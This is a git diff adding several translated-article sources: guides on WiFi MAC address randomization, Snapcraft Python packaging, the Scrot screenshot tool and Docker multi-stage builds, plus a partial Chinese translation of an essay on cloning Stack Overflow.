you to the front of the line. It's possible that some publishers will never respond at all instead of sending a rejection notice, but that's uncommon. There's not a lot to do at this point other than be patient. Of course, if it's been months and nobody's returning your e-mails, you're free to approach a different publisher or consider self-publishing. + +### Good luck + +If this process seems somewhat scattered and unscientific, you're right; it is. Getting published depends on being in the right place, at the right time, talking to the right person, and hoping they're in the right mood. You can't control all of those variables, but having a better knowledge of how the industry works, and what publishers are looking for, can help you optimize the ones you can control. + +Finding a publisher is one step in a lengthy process. You need to refine your idea and create the proposal, as well as other considerations. At SeaGL this year [I presented][5] an introduction to the entire process. Check out [the video][6] for more detailed information. + +### About the author + + [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/portrait.jpg?itok=b77dlNC4)][7] + + Brian MacDonald - Brian MacDonald is Managing Editor at the Pragmatic Bookshelf. Over the last 20 years in tech publishing, he's been an editor, author, and occasional speaker and trainer. He currently spends a lot of his time talking to new authors about how they can best present their ideas. You can follow him on Twitter at @bmac_editor.[More about me][2] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/12/how-find-publisher-your-book + +作者:[Brian MacDonald ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/bmacdonald +[1]:https://opensource.com/article/17/12/how-find-publisher-your-book?rate=o42yhdS44MUaykAIRLB3O24FvfWxAxBKa5WAWSnSY0s +[2]:https://opensource.com/users/bmacdonald +[3]:https://opensource.com/user/190176/feed +[4]:https://pragprog.com/ +[5]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook +[6]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook +[7]:https://opensource.com/users/bmacdonald +[8]:https://opensource.com/users/bmacdonald +[9]:https://opensource.com/users/bmacdonald +[10]:https://opensource.com/article/17/12/how-find-publisher-your-book#comments diff --git a/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md b/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md new file mode 100644 index 0000000000..b0f8e72018 --- /dev/null +++ b/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md @@ -0,0 +1,160 @@ +Randomize your WiFi MAC address on Ubuntu 16.04 +============================================================ + + _Your device’s MAC address can be used to track you across the WiFi networks you connect to. That data can be shared and sold, and often identifies you as an individual. It’s possible to limit this tracking by using pseudo-random MAC addresses._ + +![A captive portal screen for a hotel allowing you to log in with social media for an hour of free WiFi](https://www.paulfurley.com/img/captive-portal-our-hotel.gif) + + _Image courtesy of [Cloudessa][4]_ + +Every network device like a WiFi or Ethernet card has a unique identifier called a MAC address, for example `b4:b6:76:31:8c:ff`. It’s how networking works: any time you connect to a WiFi network, the router uses that address to send and receive packets to your machine and distinguish it from other devices in the area. + +The snag with this design is that your unique, unchanging MAC address is just perfect for tracking you. Logged into Starbucks WiFi? Noted. London Underground? Logged. + +If you’ve ever put your real name into one of those Craptive Portals on a WiFi network you’ve now tied your identity to that MAC address. Didn’t read the terms and conditions? You might assume that free airport WiFi is subsidised by flogging ‘customer analytics’ (your personal information) to hotels, restaurant chains and whomever else wants to know about you. + +I don’t subscribe to being tracked and sold by mega-corps, so I spent a few hours hacking a solution. + +### MAC addresses don’t need to stay the same + +Fortunately, it’s possible to spoof your MAC address to a random one without fundamentally breaking networking. + +I wanted to randomize my MAC address, but with three particular caveats: + +1. The MAC should be different across different networks. This means Starbucks WiFi sees a different MAC from London Underground, preventing linking my identity across different providers. + +2. The MAC should change regularly to prevent a network knowing that I’m the same person who walked past 75 times over the last year. + +3. The MAC stays the same throughout each working day. When the MAC address changes, most networks will kick you off, and those with Craptive Portals will usually make you sign in again - annoying. + +### Manipulating NetworkManager + +My first attempt of using the `macchanger` tool was unsuccessful as NetworkManager would override the MAC address according to its own configuration. + +I learned that NetworkManager 1.4.1+ can do MAC address randomization right out the box. If you’re using Ubuntu 17.04 upwards, you can get most of the way with [this config file][7]. You can’t quite achieve all three of my requirements (you must choose  _random_ or  _stable_  but it seems you can’t do  _stable-for-one-day_ ). + +Since I’m sticking with Ubuntu 16.04 which ships with NetworkManager 1.2, I couldn’t make use of the new functionality. Supposedly there is some randomization support but I failed to actually make it work, so I scripted up a solution instead. + +Fortunately NetworkManager 1.2 does allow for spoofing your MAC address. You can see this in the ‘Edit connections’ dialog for a given network: + +![Screenshot of NetworkManager's edit connection dialog, showing a text entry for a cloned mac address](https://www.paulfurley.com/img/network-manager-cloned-mac-address.png) + +NetworkManager also supports hooks - any script placed in `/etc/NetworkManager/dispatcher.d/pre-up.d/` is run before a connection is brought up. + +### Assigning pseudo-random MAC addresses + +To recap, I wanted to generate random MAC addresses based on the  _network_  and the  _date_ . We can use the NetworkManager command line, nmcli, to show a full list of networks: + +``` +> nmcli connection +NAME UUID TYPE DEVICE +Gladstone Guest 618545ca-d81a-11e7-a2a4-271245e11a45 802-11-wireless wlp1s0 +DoESDinky 6e47c080-d81a-11e7-9921-87bc56777256 802-11-wireless -- +PublicWiFi 79282c10-d81a-11e7-87cb-6341829c2a54 802-11-wireless -- +virgintrainswifi 7d0c57de-d81a-11e7-9bae-5be89b161d22 802-11-wireless -- + +``` + +Since each network has a unique identifier, to achieve my scheme I just concatenated the UUID with today’s date and hashed the result: + +``` + +# eg 618545ca-d81a-11e7-a2a4-271245e11a45-2017-12-03 + +> echo -n "${UUID}-$(date +%F)" | md5sum + +53594de990e92f9b914a723208f22b3f - + +``` + +That produced bytes which can be substituted in for the last octets of the MAC address. + +Note that the first byte `02` signifies the address is [locally administered][8]. Real, burned-in MAC addresses start with 3 bytes designing their manufacturer, for example `b4:b6:76` for Intel. + +It’s possible that some routers may reject locally administered MACs but I haven’t encountered that yet. + +On every connection up, the script calls `nmcli` to set the spoofed MAC address for every connection: + +![A terminal window show a number of nmcli command line calls](https://www.paulfurley.com/img/terminal-window-nmcli-commands.png) + +As a final check, if I look at `ifconfig` I can see that the `HWaddr` is the spoofed one, not my real MAC address: + +``` +> ifconfig +wlp1s0 Link encap:Ethernet HWaddr b4:b6:76:45:64:4d + inet addr:192.168.0.86 Bcast:192.168.0.255 Mask:255.255.255.0 + inet6 addr: fe80::648c:aff2:9a9d:764/64 Scope:Link + UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 + RX packets:12107812 errors:0 dropped:2 overruns:0 frame:0 + TX packets:18332141 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:1000 + RX bytes:11627977017 (11.6 GB) TX bytes:20700627733 (20.7 GB) + +``` + +The full script is [available on Github][9]. + +``` +#!/bin/sh + +# /etc/NetworkManager/dispatcher.d/pre-up.d/randomize-mac-addresses + +# Configure every saved WiFi connection in NetworkManager with a spoofed MAC +# address, seeded from the UUID of the connection and the date eg: +# 'c31bbcc4-d6ad-11e7-9a5a-e7e1491a7e20-2017-11-20' + +# This makes your MAC impossible(?) to track across WiFi providers, and +# for one provider to track across days. + +# For craptive portals that authenticate based on MAC, you might want to +# automate logging in :) + +# Note that NetworkManager >= 1.4.1 (Ubuntu 17.04+) can do something similar +# automatically. + +export PATH=$PATH:/usr/bin:/bin + +LOG_FILE=/var/log/randomize-mac-addresses + +echo "$(date): $*" > ${LOG_FILE} + +WIFI_UUIDS=$(nmcli --fields type,uuid connection show |grep 802-11-wireless |cut '-d ' -f3) + +for UUID in ${WIFI_UUIDS} +do + UUID_DAILY_HASH=$(echo "${UUID}-$(date +F)" | md5sum) + + RANDOM_MAC="02:$(echo -n ${UUID_DAILY_HASH} | sed 's/^\(..\)\(..\)\(..\)\(..\)\(..\).*$/\1:\2:\3:\4:\5/')" + + CMD="nmcli connection modify ${UUID} wifi.cloned-mac-address ${RANDOM_MAC}" + + echo "$CMD" >> ${LOG_FILE} + $CMD & +done + +wait +``` +Enjoy! + + _Update: [Use locally administered MAC addresses][5] to avoid clashing with real Intel ones. Thanks [@_fink][6]_ + +-------------------------------------------------------------------------------- + +via: https://www.paulfurley.com/randomize-your-wifi-mac-address-on-ubuntu-1604-xenial/ + +作者:[Paul M Furley ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.paulfurley.com/ +[1]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f/raw/5f02fc8f6ff7fca5bca6ee4913c63bf6de15abca/randomize-mac-addresses +[2]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f#file-randomize-mac-addresses +[3]:https://github.com/ +[4]:http://cloudessa.com/products/cloudessa-aaa-and-captive-portal-cloud-service/ +[5]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f/revisions#diff-824d510864d58c07df01102a8f53faef +[6]:https://twitter.com/fink_/status/937305600005943296 +[7]:https://gist.github.com/paulfurley/978d4e2e0cceb41d67d017a668106c53/ +[8]:https://en.wikipedia.org/wiki/MAC_address#Universal_vs._local +[9]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f diff --git a/sources/tech/20171202 Easily control delivery of your Python applications to millions of Linux users with Snapcraft.md b/sources/tech/20171202 Easily control delivery of your Python applications to millions of Linux users with Snapcraft.md new file mode 100644 index 0000000000..dbdebf63e3 --- /dev/null +++ b/sources/tech/20171202 Easily control delivery of your Python applications to millions of Linux users with Snapcraft.md @@ -0,0 +1,321 @@ +Python +============================================================ + +Python has rich tools for packaging, distributing and sandboxing applications. Snapcraft builds on top of these familiar tools such as `pip`, `setup.py` and `requirements.txt` to create snaps for people to install on Linux. + +### What problems do snaps solve for Python applications? + +Linux install instructions for Python applications often get complicated. System dependencies, which differ from distribution to distribution, must be separately installed. To prevent modules from different Python applications clashing with each other, developer tools like `virtualenv` or `venv` must be used. With snapcraft it’s one command to produce a bundle that works anywhere. + +Here are some snap advantages that will benefit many Python projects: + +* Bundle all the runtime requirements, including the exact versions of system libraries and the Python interpreter. + +* Simplify installation instructions, regardless of distribution, to `snap install mypythonapp`. + +* Directly control the delivery of automatic application updates. + +* Extremely simple creation of daemons. + +### Getting started + +Let’s take a look at offlineimap and youtube-dl by way of examples. Both are command line applications. offlineimap uses Python 2 and only has Python module requirements. youtube-dl uses Python 3 and has system package requirements, in this case `ffmpeg`. + +### offlineimap + +Snaps are defined in a single yaml file placed in the root of your project. The offlineimap example shows the entire `snapcraft.yaml` for an existing project. We’ll break this down. + +``` +name: offlineimap +version: git +summary: OfflineIMAP +description: | + OfflineIMAP is software that downloads your email mailbox(es) as local + Maildirs. OfflineIMAP will synchronize both sides via IMAP. + +grade: devel +confinement: devmode + +apps: + offlineimap: + command: bin/offlineimap + +parts: + offlineimap: + plugin: python + python-version: python2 + source: . + +``` + +#### Metadata + +The `snapcraft.yaml` starts with a small amount of human-readable metadata, which usually can be lifted from the GitHub description or project README.md. This data is used in the presentation of your app in the Snap Store. The `summary:` can not exceed 79 characters. You can use a pipe with the `description:` to declare a multi-line description. + +``` +name: offlineimap +version: git +summary: OfflineIMAP +description: | + OfflineIMAP is software that downloads your email mailbox(es) as local + Maildirs. OfflineIMAP will synchronize both sides via IMAP. + +``` + +#### Confinement + +To get started we won’t confine this application. Unconfined applications, specified with `devmode`, can only be released to the hidden “edge” channel where you and other developers can install them. + +``` +confinement: devmode + +``` + +#### Parts + +Parts define how to build your app. Parts can be anything: programs, libraries, or other assets needed to create and run your application. In this case we have one: the offlineimap source code. In other cases these can point to local directories, remote git repositories, or tarballs. + +The Python plugin will also bundle Python in the snap, so you can be sure that the version of Python you test against is included with your app. Dependencies from `install_requires` in your `setup.py` will also be bundled. Dependencies from a `requirements.txt` file can also be bundled using the `requirements:` option. + +``` +parts: + offlineimap: + plugin: python + python-version: python2 + source: . + +``` + +#### Apps + +Apps are the commands and services exposed to end users. If your command name matches the snap `name`, users will be able run the command directly. If the names differ, then apps are prefixed with the snap `name`(`offlineimap.command-name`, for example). This is to avoid conflicting with apps defined by other installed snaps. + +If you don’t want your command prefixed you can request an alias for it on the [Snapcraft forum][1]. These command aliases are set up automatically when your snap is installed from the Snap Store. + +``` +apps: + offlineimap: + command: bin/offlineimap + +``` + +If your application is intended to run as a service, add the line `daemon: simple` after the command keyword. This will automatically keep the service running on install, update and reboot. + +### Building the snap + +You’ll first need to [install snap support][2], and then install the snapcraft tool: + +``` +sudo snap install --beta --classic snapcraft + +``` + +If you have just installed snap support, start a new shell so your `PATH` is updated to include `/snap/bin`. You can then build this example yourself: + +``` +git clone https://github.com/snapcraft-docs/offlineimap +cd offlineimap +snapcraft + +``` + +The resulting snap can be installed locally. This requires the `--dangerous` flag because the snap is not signed by the Snap Store. The `--devmode` flag acknowledges that you are installing an unconfined application: + +``` +sudo snap install offlineimap_*.snap --devmode --dangerous + +``` + +You can then try it out: + +``` +offlineimap + +``` + +Removing the snap is simple too: + +``` +sudo snap remove offlineimap + +``` + +Jump ahead to [Share with your friends][3] or continue to read another example. + +### youtube-dl + +The youtube-dl example shows a `snapcraft.yaml` using a tarball of a Python application and `ffmpeg` bundled in the snap to satisfy the runtime requirements. Here is the entire `snapcraft.yaml` for youtube-dl. We’ll break this down. + +``` +name: youtube-dl +version: 2017.06.18 +summary: YouTube Downloader. +description: | + youtube-dl is a small command-line program to download videos from + YouTube.com and a few more sites. + +grade: devel +confinement: devmode + +parts: + youtube-dl: + source: https://github.com/rg3/youtube-dl/archive/$SNAPCRAFT_PROJECT_VERSION.tar.gz + plugin: python + python-version: python3 + after: [ffmpeg] + +apps: + youtube-dl: + command: bin/youtube-dl + +``` + +#### Parts + +The `$SNAPCRAFT_PROJECT_VERSION` variable is derived from the `version:` stanza and used here to reference the matching release tarball. Because the `python` plugin is used, snapcraft will bundle a copy of Python in the snap using the version specified in the `python-version:` stanza, in this case Python 3. + +youtube-dl makes use of `ffmpeg` to transcode or otherwise convert the audio and video file it downloads. In this example, youtube-dl is told to build after the `ffmpeg` part. Because the `ffmpeg` part specifies no plugin, it will be fetched from the parts repository. This is a collection of community-contributed definitions which can be used by anyone when building a snap, saving you from needing to specify the source and build rules for each system dependency. You can use `snapcraft search` to find more parts to use and `snapcraft define ` to verify how the part is defined. + +``` +parts: + youtube-dl: + source: https://github.com/rg3/youtube-dl/archive/$SNAPCRAFT_PROJECT_VERSION.tar.gz + plugin: python + python-version: python3 + after: [ffmpeg] + +``` + +### Building the snap + +You can build this example yourself by running the following: + +``` +git clone https://github.com/snapcraft-docs/youtube-dl +cd youtube-dl +snapcraft + +``` + +The resulting snap can be installed locally. This requires the `--dangerous` flag because the snap is not signed by the Snap Store. The `--devmode` flag acknowledges that you are installing an unconfined application: + +``` +sudo snap install youtube-dl_*.snap --devmode --dangerous + +``` + +Run the command: + +``` +youtube-dl “https://www.youtube.com/watch?v=k-laAxucmEQ” + +``` + +Removing the snap is simple too: + +``` +sudo snap remove youtube-dl + +``` + +### Share with your friends + +To share your snaps you need to publish them in the Snap Store. First, create an account on [the dashboard][4]. Here you can customize how your snaps are presented, review your uploads and control publishing. + +You’ll need to choose a unique “developer namespace” as part of the account creation process. This name will be visible by users and associated with your published snaps. + +Make sure the `snapcraft` command is authenticated using the email address attached to your Snap Store account: + +``` +snapcraft login + +``` + +### Reserve a name for your snap + +You can publish your own version of a snap, provided you do so under a name you have rights to. + +``` +snapcraft register mypythonsnap + +``` + +Be sure to update the `name:` in your `snapcraft.yaml` to match this registered name, then run `snapcraft` again. + +### Upload your snap + +Use snapcraft to push the snap to the Snap Store. + +``` +snapcraft push --release=edge mypthonsnap_*.snap + +``` + +If you’re happy with the result, you can commit the snapcraft.yaml to your GitHub repo and [turn on automatic builds][5] so any further commits automatically get released to edge, without requiring you to manually build locally. + +### Further customisations + +Here are all the Python plugin-specific keywords: + +``` +- requirements: + (string) + Path to a requirements.txt file +- constraints: + (string) + Path to a constraints file +- process-dependency-links: + (bool; default: false) + Enable the processing of dependency links in pip, which allow one project + to provide places to look for another project +- python-packages: + (list) + A list of dependencies to get from PyPI +- python-version: + (string; default: python3) + The python version to use. Valid options are: python2 and python3 + +``` + +You can view them locally by running: + +``` +snapcraft help python + +``` + +### Extending and overriding behaviour + +You can [extend the behaviour][6] of any part in your `snapcraft.yaml` with shell commands. These can be run after pulling the source code but before building by using the `prepare` keyword. The build process can be overridden entirely using the `build` keyword and shell commands. The `install` keyword is used to run shell commands after building your code, useful for making post build modifications such as relocating build assets. + +Using the youtube-dl example above, we can run the test suite at the end of the build. If this fails, the snap creation will be terminated: + +``` +parts: + youtube-dl: + source: https://github.com/rg3/youtube-dl/archive/$SNAPCRAFT_PROJECT_VERSION.tar.gz + plugin: python + python-version: python3 + stage-packages: [ffmpeg, python-nose] + install: | + nosetests +``` + +-------------------------------------------------------------------------------- + +via: https://docs.snapcraft.io/build-snaps/python + +作者:[Snapcraft.io ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:Snapcraft.io + +[1]:https://forum.snapcraft.io/t/process-for-reviewing-aliases-auto-connections-and-track-requests/455 +[2]:https://docs.snapcraft.io/core/install +[3]:https://docs.snapcraft.io/build-snaps/python#share-with-your-friends +[4]:https://dashboard.snapcraft.io/openid/login/?next=/dev/snaps/ +[5]:https://build.snapcraft.io/ +[6]:https://docs.snapcraft.io/build-snaps/scriptlets diff --git a/sources/tech/20171202 Scrot Linux command-line screen grabs made simple b/sources/tech/20171202 Scrot Linux command-line screen grabs made simple new file mode 100644 index 0000000000..979ed86b3c --- /dev/null +++ b/sources/tech/20171202 Scrot Linux command-line screen grabs made simple @@ -0,0 +1,72 @@ +Translating by filefi + +# Scrot: Linux command-line screen grabs made simple + +by [Scott Nesbitt][a] · November 30, 2017 + +> Scrot is a basic, flexible tool that offers a number of handy options for taking screen captures from the Linux command line. + +[![Original photo by Rikki Endsley. CC BY-SA 4.0](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/community-penguins-osdc-lead.png?itok=BmqsAF4A)][1] + + + +There are great tools on the Linux desktop for taking screen captures, such as [KSnapshot][2] and [Shutter][3]. Even the simple utility that comes with the GNOME desktop does a pretty good job of capturing screens. But what if you rarely need to take screen captures? Or you use a Linux distribution without a built-in capture tool, or an older computer with limited resources? + +Turn to the command line and a little utility called [Scrot][4]. It does a fine job of taking simple screen captures, and it includes a few features that might surprise you. + +### Getting started with Scrot +Many Linux distributions come with Scrot already installed—to check, type `which scrot`. If it isn't there, you can install Scrot using your distro's package manager. If you're willing to compile the code, grab it [from GitHub][5]. + +To take a screen capture, crack open a terminal window and type `scrot [filename]`, where `[filename]` is the name of file to which you want to save the image (for example, `desktop.png`). If you don't include a name for the file, Scrot will create one for you, such as `2017-09-24-185009_1687x938_scrot.png`. (That filename isn't as descriptive it could be, is it? That's why it's better to add one to the command.) + +Running Scrot with no options takes a screen capture of your entire desktop. If you don't want to do that, Scrot lets you focus on smaller portions of your screen. + +### Taking a screen capture of a single window + +Tell Scrot to take a screen capture of a single window by typing `scrot -u [filename]`. + +The `-u` option tells Scrot to grab the window currently in focus. That's usually the terminal window you're working in, which might not be the one you want. + +To grab another window on your desktop, type `scrot -s [filename]`. + +The `-s` option lets you do one of two things: + +* select an open window, or + +* draw a rectangle around a window or a portion of a window to capture it. + +You can also set a delay, which gives you a little more time to select the window you want to capture. To do that, type `scrot -u -d [num] [filename]`. + +The `-d` option tells Scrot to wait before grabbing the window, and `[num]` is the number of seconds to wait. Specifying `-d 5` (wait five seconds) should give you enough time to choose a window. + +### More useful options + +Scrot offers a number of additional features (most of which I never use). The ones I find most useful include: + +* `-b` also grabs the window's border + +* `-t` grabs a window and creates a thumbnail of it. This can be useful when you're posting screen captures online. + +* `-c` creates a countdown in your terminal when you use the `-d` option. + +To learn about Scrot's other options, check out the its documentation by typing `man scrot` in a terminal window, or [read it online][6]. Then start snapping images of your screen. + +It's basic, but Scrot gets the job done nicely. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot + +作者:[Scott Nesbitt][a] +译者:[filefi](https://github.com/filefi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/scottnesbitt +[1]:https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/community-penguins-osdc-lead.png?itok=BmqsAF4A +[2]:https://www.kde.org/applications/graphics/ksnapshot/ +[3]:https://launchpad.net/shutter +[4]:https://github.com/dreamer/scrot +[5]:http://manpages.ubuntu.com/manpages/precise/man1/scrot.1.html +[6]:https://github.com/dreamer/scrot diff --git a/sources/tech/20171202 docker - Use multi-stage builds.md b/sources/tech/20171202 docker - Use multi-stage builds.md new file mode 100644 index 0000000000..e1a6414862 --- /dev/null +++ b/sources/tech/20171202 docker - Use multi-stage builds.md @@ -0,0 +1,127 @@ +Use multi-stage builds +============================================================ + +Multi-stage builds are a new feature requiring Docker 17.05 or higher on the daemon and client. Multistage builds are useful to anyone who has struggled to optimize Dockerfiles while keeping them easy to read and maintain. + +> Acknowledgment: Special thanks to [Alex Ellis][1] for granting permission to use his blog post [Builder pattern vs. Multi-stage builds in Docker][2] as the basis of the examples below. + +### Before multi-stage builds + +One of the most challenging things about building images is keeping the image size down. Each instruction in the Dockerfile adds a layer to the image, and you need to remember to clean up any artifacts you don’t need before moving on to the next layer. To write a really efficient Dockerfile, you have traditionally needed to employ shell tricks and other logic to keep the layers as small as possible and to ensure that each layer has the artifacts it needs from the previous layer and nothing else. + +It was actually very common to have one Dockerfile to use for development (which contained everything needed to build your application), and a slimmed-down one to use for production, which only contained your application and exactly what was needed to run it. This has been referred to as the “builder pattern”. Maintaining two Dockerfiles is not ideal. + +Here’s an example of a `Dockerfile.build` and `Dockerfile` which adhere to the builder pattern above: + +`Dockerfile.build`: + +``` +FROM golang:1.7.3 +WORKDIR /go/src/github.com/alexellis/href-counter/ +RUN go get -d -v golang.org/x/net/html +COPY app.go . +RUN go get -d -v golang.org/x/net/html \ + && CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o app . + +``` + +Notice that this example also artificially compresses two `RUN` commands together using the Bash `&&` operator, to avoid creating an additional layer in the image. This is failure-prone and hard to maintain. It’s easy to insert another command and forget to continue the line using the `\` character, for example. + +`Dockerfile`: + +``` +FROM alpine:latest +RUN apk --no-cache add ca-certificates +WORKDIR /root/ +COPY app . +CMD ["./app"] + +``` + +`build.sh`: + +``` +#!/bin/sh +echo Building alexellis2/href-counter:build + +docker build --build-arg https_proxy=$https_proxy --build-arg http_proxy=$http_proxy \ + -t alexellis2/href-counter:build . -f Dockerfile.build + +docker create --name extract alexellis2/href-counter:build +docker cp extract:/go/src/github.com/alexellis/href-counter/app ./app +docker rm -f extract + +echo Building alexellis2/href-counter:latest + +docker build --no-cache -t alexellis2/href-counter:latest . +rm ./app + +``` + +When you run the `build.sh` script, it needs to build the first image, create a container from it in order to copy the artifact out, then build the second image. Both images take up room on your system and you still have the `app` artifact on your local disk as well. + +Multi-stage builds vastly simplify this situation! + +### Use multi-stage builds + +With multi-stage builds, you use multiple `FROM` statements in your Dockerfile. Each `FROM` instruction can use a different base, and each of them begins a new stage of the build. You can selectively copy artifacts from one stage to another, leaving behind everything you don’t want in the final image. To show how this works, Let’s adapt the Dockerfile from the previous section to use multi-stage builds. + +`Dockerfile`: + +``` +FROM golang:1.7.3 +WORKDIR /go/src/github.com/alexellis/href-counter/ +RUN go get -d -v golang.org/x/net/html +COPY app.go . +RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o app . + +FROM alpine:latest +RUN apk --no-cache add ca-certificates +WORKDIR /root/ +COPY --from=0 /go/src/github.com/alexellis/href-counter/app . +CMD ["./app"] + +``` + +You only need the single Dockerfile. You don’t need a separate build script, either. Just run `docker build`. + +``` +$ docker build -t alexellis2/href-counter:latest . + +``` + +The end result is the same tiny production image as before, with a significant reduction in complexity. You don’t need to create any intermediate images and you don’t need to extract any artifacts to your local system at all. + +How does it work? The second `FROM` instruction starts a new build stage with the `alpine:latest` image as its base. The `COPY --from=0` line copies just the built artifact from the previous stage into this new stage. The Go SDK and any intermediate artifacts are left behind, and not saved in the final image. + +### Name your build stages + +By default, the stages are not named, and you refer to them by their integer number, starting with 0 for the first `FROM` instruction. However, you can name your stages, by adding an `as ` to the `FROM` instruction. This example improves the previous one by naming the stages and using the name in the `COPY` instruction. This means that even if the instructions in your Dockerfile are re-ordered later, the `COPY` won’t break. + +``` +FROM golang:1.7.3 as builder +WORKDIR /go/src/github.com/alexellis/href-counter/ +RUN go get -d -v golang.org/x/net/html +COPY app.go . +RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o app . + +FROM alpine:latest +RUN apk --no-cache add ca-certificates +WORKDIR /root/ +COPY --from=builder /go/src/github.com/alexellis/href-counter/app . +CMD ["./app"] +``` + +-------------------------------------------------------------------------------- + +via: https://docs.docker.com/engine/userguide/eng-image/multistage-build/#name-your-build-stages + +作者:[docker docs ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://docs.docker.com/engine/userguide/eng-image/multistage-build/ +[1]:https://twitter.com/alexellisuk +[2]:http://blog.alexellis.io/mutli-stage-docker-builds/ diff --git a/translated/tech/20090701 The One in Which I Call Out Hacker News.md b/translated/tech/20090701 The One in Which I Call Out Hacker News.md new file mode 100644 index 0000000000..670be95353 --- /dev/null +++ b/translated/tech/20090701 The One in Which I Call Out Hacker News.md @@ -0,0 +1,99 @@ +我号召黑客新闻的理由之一 +实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗? +不,你没有。 +我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间,这是程序员永远的 +乐观主义。 +- Owen Astrachan 教授于 2004 年 2 月 23 日在 CPS 108 上的讲座 + +指责开源软件的使用存在着高昂的代价已经不是一个新论点了,它之前就被提过,而且说的比我更有信服力,即使一些人已经在高度赞扬开源软件的运作。 +这种事为什么会重复发生? + +在周一的黑客新闻上,我愉悦地看着某些人一边说写 Stack Overflow 简单的简直搞笑,一边通过允许七月第四个周末之后的克隆来开始备份他们的提问。 +其他的声明中也指出现存的克隆是一个好的出发点。 + +让我们假设,为了争辩,你觉得将自己的 Stack Overflow 通过 ASP.NET 和 MVC 克隆是正确的,然后被一块廉价的手表和一个小型俱乐部头领忽悠之后, +决定去手动拷贝你 Stack Overflow 的源代码,一页又一页,所以你可以逐字逐句地重新输入,我们同样会假定你像我一样打字,很酷的有 100 WPM +(差不多每秒8个字符),不和我一样的话,你不会犯错。 + + Stack Overflow 的 *.cs、*.sql、*.css、*.js 和 *.aspx 文件大约 2.3 MB,因此如果你想将这些源代码输进电脑里去的话,即使你不犯错也需要大约 80 个小时。 + +除非......当然,你是不会那样做的:你打算从头开始实现 Stack Overflow 。所以即使我们假设,你花了十倍的时间去设计、输出,然后调试你自己的实现而不是去拷 +贝已有的那份,那已经让你已经编译了好几个星期。我不知道你,但是我可以承认我写的新代码大大小于我复制的现有代码的十分之一。 + +好,ok,我听见你松了口气。所以不是全部。但是我可以做大部分。 + +行,所以什么是大部分?这只是询问和回答问题,这个部分很简单。那么,除了你必须实现对问题和答案投票、赞同还是反对,而且提问者应该能够去接收每一个问题的 +单一答案。你不能让人们赞同或者反对他们自己的回答。所以你需要去阻止。你需要去确保用户在一定的时间内不会赞同或反对其他用户太多次。以预防垃圾邮件, +你可能也需要去实现一个垃圾邮件过滤器,即使在一个基本的设计里,也要考虑到这一点。而且还需要去支持用户图标。并且你将不得不寻找一个自己真正信任的并且 +与 markdown 接合很好的 HTML 库(当然,你确实希望重新使用那个令人敬畏的编辑器 Stack Overflow ),你还需要为所有控件购买,设计或查找小部件,此外 +你至少需要一个基本的管理界面,以便用户可以调节,并且你需要实现可扩展的业务量,以便能稳定地给用户越来越多的功能去实现他们想做的。 + +如果你这样做了,你可以完成它。 + +除了...除了全文检索外,特别是它在“寻找问题”功能中的表现,这是必不可少的。然后用户的基本信息,和回答的意见,然后有一个主要展示你的重要问题, +但是它会稳定的冒泡式下降。另外你需要去实现奖励,并支持每个用户的多个 OpenID 登录,然后为相关的事件发送邮件通知,并添加一个标签系统, +接着允许管理员通过一个不错的图形界面配置徽章。你需要去显示用户的 karma 历史,点赞和差评。整个事情的规模都非常好,因为它随时都可以被 + slashdotted、reddited 或是 Stack Overflow 。 + +在这之后!你就已经完成了! + +...在正确地实现升级、国际化、业绩上限和一个 css 设计之后,使你的站点看起来不像是一个屁股,上面的大部分 AJAX 版本和 G-d 知道什么会同样潜伏 +在你所信任的界面下,但是当你开始做一个真正的克隆的时候,就会遇到它。 + +告诉我:这些功能中哪个是你感觉可以削减而让它仍然是一个引人注目的产品,哪些是大部分网站之下的呢?哪个你可以剔除呢? + +开发者因为开源软件的使用是一个可怕的痛苦这样一个相同的理由认为克隆一个像 Stack Overflow 的站点很简单。当你把一个开发者放在 Stack Overflow 前面, +他们并不真的看到 Stack Overflow,他们实际上看的是这些: + +create table QUESTION (ID identity primary key, + TITLE varchar(255), --- 为什么我知道你认为是 255 + BODY text, + UPVOTES integer not null default 0, + DOWNVOTES integer not null default 0, + USER integer references USER(ID)); +create table RESPONSE 